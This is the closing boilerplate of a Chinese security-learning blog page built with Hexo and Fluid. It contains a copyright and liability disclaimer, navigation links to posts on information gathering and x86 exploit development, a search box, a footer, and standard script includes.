                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！，本博客仅用于交流学习，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，文章作者不为此承担任何责任。
文章作者拥有对此站文章的修改和解释权。如欲转载此站文章，需取得作者同意，且必须保证此文章的完整性，包括版权声明等全部内容。未经文章作者允许，不得任意修改或者增减此文章内容，不得以任何方式将其用于商业目的。若造成严重后果，本人将依法追究法律责任。 阅读本站文章则默认遵守此规则。
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/07/28/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">信息收集</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/05/23/SploitFun-Linux-x86-Exploit-%E5%BC%80%E5%8F%91%E7%B3%BB%E5%88%97%E6%95%99%E7%A8%8B-%E5%AD%A6%E4%B9%A0/">
                        <span class="hidden-mobile">《SploitFun Linux x86 Exploit 开发系列教程》学习</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        琼ICP备2021006694号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.0/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.6/dist/clipboard.min.js" ></script>






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
